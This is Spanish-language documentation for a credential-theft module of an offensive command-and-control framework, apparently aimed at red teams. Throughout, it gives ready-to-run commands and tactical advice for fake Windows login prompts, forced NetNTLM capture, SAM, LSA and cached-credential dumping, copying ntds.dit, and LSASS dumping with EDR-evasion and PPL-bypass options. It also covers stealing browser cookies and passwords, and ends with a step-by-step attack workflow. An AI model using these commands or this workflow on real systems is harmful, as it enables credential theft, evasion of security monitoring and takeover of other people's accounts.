En esta página
Creds-BOF — Extracción de Credenciales
El módulo Creds-BOF proporciona herramientas para la extracción de credenciales en sistemas Windows. Incluye técnicas que van desde la ingeniería social hasta el volcado de memoria de LSASS, cubriendo escenarios tanto con privilegios de usuario estándar como de administrador.
Agentes compatibles: Beacon, Gopher, Kharon (Windows)
askcreds
Muestra un cuadro de diálogo de autenticación de Windows al usuario para capturar sus credenciales mediante ingeniería social.
askcredsRequisitos: Ninguno (funciona como usuario estándar)
Cuándo usarlo: Cuando tienes acceso como usuario no privilegiado y necesitas obtener credenciales. El cuadro de diálogo imita una solicitud legítima de Windows. Es más efectivo cuando:
- El usuario ha estado inactivo (verifica con
useridletime) - Se combina con una justificación creíble (actualización, reconexión de red)
- El objetivo es un usuario no técnico
Las credenciales capturadas se extraen automáticamente al panel de Credentials de JustC2.
get-netntlm
Fuerza la autenticación NetNTLM del sistema hacia un listener controlado para capturar el hash.
get-netntlm \\10.0.0.50\share| Argumento | Requerido | Descripción |
|---|---|---|
listener | Sí | Ruta UNC del listener (ej: \\IP\share) |
Requisitos: Ninguno (funciona como usuario estándar)
Cuándo usarlo: Para capturar el hash NetNTLM del usuario o la cuenta de máquina. El hash puede ser:
- Crackeado offline con herramientas como Hashcat o John the Ripper
- Relayeado a otros servicios si la red no tiene protecciones de signing/channel binding (verifica con RelayInformer)
Requiere un listener de captura de hashes activo (Responder, ntlmrelayx, etc.) en la dirección especificada.
hashdump
Extrae los hashes NTLM de la base de datos SAM local.
hashdumpRequisitos: Administrador local
Extracción automática: Los hashes extraídos se registran automáticamente en el panel de Credentials de JustC2, listos para ser usados en ataques Pass-the-Hash.
Cuándo usarlo: Inmediatamente después de obtener privilegios de administrador local. Los hashes SAM incluyen cuentas locales que pueden reutilizarse en otros sistemas de la red (password reuse). Particularmente valioso el hash del administrador local si se usa la misma contraseña en múltiples máquinas.
lsadump_secrets
Extrae los secretos almacenados en LSA (Local Security Authority).
lsadump_secretsRequisitos: SYSTEM o Administrador local
Cuándo usarlo: Los secretos LSA contienen:
- Contraseñas de cuentas de servicio en texto claro
- Credenciales de autologon
- Historial de contraseñas de la cuenta de máquina
- Claves de VPN y otros secretos almacenados por aplicaciones
Ejecuta este comando en servidores que ejecutan servicios con cuentas de dominio para obtener sus contraseñas.
lsadump_sam
Método alternativo para extraer los hashes de la base de datos SAM.
lsadump_samRequisitos: Administrador local
Cuándo usarlo: Si hashdump falla o está bloqueado por el antivirus, prueba con este método alternativo que utiliza una técnica de extracción diferente.
lsadump_cache
Extrae las credenciales de dominio cacheadas (Domain Cached Credentials — DCC2).
lsadump_cacheRequisitos: Administrador local
Cuándo usarlo: En máquinas unidas a un dominio, Windows cachea las credenciales de los últimos usuarios que iniciaron sesión para permitir el acceso offline. Los hashes DCC2 pueden ser crackeados offline, aunque son significativamente más lentos que los NTLM. Útil cuando:
- No puedes acceder a un controlador de dominio
- Necesitas credenciales de usuarios que han iniciado sesión en esa máquina
- Los usuarios de interés (administradores de dominio) han usado la máquina recientemente
underlaycopy
Copia archivos bloqueados utilizando el servicio de Volume Shadow Copy (VSS).
underlaycopy C:\Windows\System32\config\SAM C:\Temp\SAM.bak
underlaycopy C:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit| Argumento | Requerido | Descripción |
|---|---|---|
source_file | Sí | Ruta del archivo origen (bloqueado) |
dest_file | Sí | Ruta del archivo destino |
Requisitos: Administrador local
Cuándo usarlo: Para copiar archivos que están en uso y bloqueados por el sistema operativo, como:
- SAM/SYSTEM/SECURITY — Hives del registro para extracción offline de hashes
- ntds.dit — Base de datos de Active Directory en controladores de dominio
- Archivos de base de datos bloqueados por servicios en ejecución
nanodump
Herramienta avanzada para volcar la memoria del proceso LSASS utilizando llamadas al sistema directas (syscalls). Proporciona múltiples técnicas de evasión para evitar la detección por antivirus y EDR.
Requisitos: Administrador local, arquitectura x64
Uso básico
nanodump
nanodump -w C:\Windows\Temp\report.docx
nanodump -d -w C:\Windows\Temp\report.docxTécnicas de obtención de handle
Estas opciones controlan cómo nanodump obtiene acceso al proceso LSASS. Solo se puede usar una a la vez:
| Opción | Descripción |
|---|---|
-d | Duplicate — Duplica un handle existente con privilegios altos hacia LSASS |
-de | Duplicate-Elevate — Duplica un handle de bajos privilegios y lo eleva |
-eh | Elevate-Handle — Abre un handle con bajos privilegios y lo duplica para obtener mayores privilegios |
-slr PATH | Seclogon-Leak-Remote — Filtra un handle de LSASS hacia otro proceso vía seclogon y lo duplica |
-sd | Seclogon-Duplicate — Hace que seclogon abra un handle hacia LSASS y lo duplica |
-sc | Spoof-Callstack — Abre un handle hacia LSASS usando una pila de llamadas falsa |
Técnicas de volcado alternativas
| Opción | Descripción |
|---|---|
-spe PATH | Silent-Process-Exit — Fuerza a WerFault.exe a volcar LSASS. Especificar carpeta de destino |
-sk | Shtinkering — Fuerza a WerFault.exe a volcar LSASS vía Shtinkering. Requiere SYSTEM |
Opciones de volcado
| Opción | Descripción |
|---|---|
-w PATH | Escribe el volcado en disco en la ruta especificada |
--valid | Crea un volcado con firma MiniDump válida |
--fork | Forkea el proceso objetivo antes de volcarlo |
--snapshot | Crea un snapshot del proceso antes de volcarlo |
--getpid | Solo muestra el PID de LSASS y sale |
--pid PID | Especifica manualmente el PID de LSASS |
Variantes adicionales
nanodump_ppl_dump
Bypass de PPL (Protected Process Light) para volcar LSASS en sistemas con protección.
nanodump_ppl_dump -w C:\Windows\Temp\report.docx
nanodump_ppl_dump -d -w C:\Windows\Temp\report.docx --validnanodump_ppl_medic
Bypass de PPL usando la técnica PPLMedic.
nanodump_ppl_medic -w C:\Windows\Temp\report.docx
nanodump_ppl_medic -eh -w C:\Windows\Temp\report.docxnanodump_ssp
Inyecta un SSP (Security Support Provider) en LSASS para interceptar credenciales en tiempo real.
nanodump_ssp -w C:\Windows\Temp\doc.docx --write-dll C:\Windows\Temp\ssp.dll
nanodump_ssp -w C:\Windows\Temp\doc.docx --load-dll C:\Windows\Temp\existing.dllCuándo usarlo: Nanodump es la herramienta preferida para volcar LSASS cuando hay AV/EDR presente. Elige la técnica según el entorno:
- Sin EDR: Uso básico sin opciones (
nanodump) - EDR detecta OpenProcess: Usa
-d(duplicar handle existente) o-sc(spoof callstack) - EDR monitoriza handles: Usa
-sd(seclogon) o-slr(seclogon remote) - LSASS protegido con PPL: Usa
nanodump_ppl_dumponanodump_ppl_medic - Monitorización de MiniDump: Usa
--forko--snapshotpara evitar detección basada en el volcado directo
Si el volcado en disco puede ser detectado, omite -w para que el dump se envíe directamente por el canal del agente sin tocar disco.
cookie-monster
Extrae cookies, contraseñas guardadas y claves de cifrado de navegadores Chrome, Edge y Firefox.
cookie-monster -b chrome
cookie-monster -b msedge
cookie-monster -b firefox
cookie-monster -b all
cookie-monster -b chrome --cookie-only
cookie-monster -b chrome --password-only
cookie-monster -b chrome --key-only
cookie-monster --profile "C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State" 1234| Argumento | Requerido | Descripción |
|---|---|---|
-b | Sí* | Navegador: chrome, msedge, firefox o all |
--profile | Sí* | Ruta al archivo Local State del perfil (alternativa a -b) |
--cookie-only | No | Solo extraer cookies |
--password-only | No | Solo extraer contraseñas guardadas |
--key-only | No | Solo extraer la clave de cifrado app-bound |
pid | No | PID del proceso del navegador (requerido con --profile) |
*Se debe usar -b o --profile, no ambos.
Cuándo usarlo: Para obtener acceso a sesiones web activas del usuario:
- Cookies de sesión — Acceso directo a aplicaciones web sin necesidad de credenciales
- Contraseñas guardadas — Credenciales almacenadas en el navegador
- Claves de cifrado — Para descifrar datos del navegador offline
Especialmente útil para acceder a paneles de administración web, servicios cloud, y aplicaciones SaaS donde el usuario tiene sesión activa.
Flujo de trabajo recomendado
Como usuario no privilegiado:
askcreds— Intentar obtener credenciales por ingeniería socialget-netntlm— Capturar hash NetNTLM para cracking/relay
Como administrador local:
hashdump— Extraer hashes SAMlsadump_secrets— Extraer secretos LSAlsadump_cache— Extraer credenciales de dominio cacheadasnanodump— Volcar LSASS para obtener credenciales en memoriacookie-monster -b all— Extraer datos de navegadores